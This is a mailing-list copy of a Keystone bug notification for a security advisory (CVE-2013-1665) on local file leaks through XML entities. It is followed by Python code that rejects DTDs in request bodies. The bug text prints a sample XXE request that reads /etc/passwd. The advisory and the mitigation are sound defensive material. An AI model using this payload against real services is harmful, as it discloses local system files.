yahoo-eng-team team mailing list archive

[Bug 1100279] Re: [OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

 

** Changed in: keystone/essex
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1100279

Title:
  [OSSA 2013-004] Local file leak through entities in XML requests
  (CVE-2013-1665)

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Released
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  Evil XML! Jonathan Murray from NCC Group reported that you can leak
  local file contents using XML entities in Keystone requests:

  POST /v2.0//OS-KSDM/roles HTTP/1.1
  x-auth-token: d0e1a2d3b4e5e6f7
  content-type: application/xml

  <!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
  <role>
  <name>&ent;</name>
  </role>

  just returns the content of the local file in role.name.

  Looks like we should disable parsing entities altogether, they seem to
  be exploitable in pretty awesome ways. I'm not sure only Keystone is
  affected by this.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1100279/+subscriptions
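
The mitigation suggested at the end of the bug description, disabling entity parsing altogether, can be applied at the parser level by refusing any request body that carries a DOCTYPE. This is an added example, not Keystone's actual fix or code from this thread; the names parse_request_xml, ForbiddenXML and role_name are hypothetical, the sample bodies are constructed, and only the Python standard library is assumed.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class ForbiddenXML(ValueError):
    """Request body carries a DTD or entity declaration (hypothetical name)."""


def parse_request_xml(body: bytes) -> ET.Element:
    """Parse an XML request body, refusing any DOCTYPE or entity."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()

    def reject(kind):
        def handler(*_args):
            raise ForbiddenXML(f"{kind} not allowed in request body")
        return handler

    # A DOCTYPE is the only place entities can be declared, so rejecting it
    # also stops internal entity expansion; the other two are defence in depth.
    parser.StartDoctypeDeclHandler = reject("DOCTYPE")
    parser.EntityDeclHandler = reject("entity declaration")
    parser.ExternalEntityRefHandler = reject("external entity reference")

    # Feed ordinary element events into a standard ElementTree builder.
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(body, True)
    return builder.close()


# Constructed sample bodies (not captured traffic).
BENIGN = b"<role><name>admin &amp; ops</name></role>"
WITH_DTD = (b'<!DOCTYPE doc [ <!ENTITY ent SYSTEM "file:///constructed/path"> ]>'
            b"<role><name>&ent;</name></role>")


def role_name(body: bytes):
    """Return role.name, or None when the body is refused or malformed."""
    try:
        return parse_request_xml(body).findtext("name")
    except (ForbiddenXML, expat.ExpatError):
        return None


if __name__ == "__main__":
    print(role_name(BENIGN))    # predefined entities such as &amp; still work
    print(role_name(WITH_DTD))  # refused before any entity is resolved
```

A body that references an entity without declaring it is also refused, because expat reports an undefined entity error.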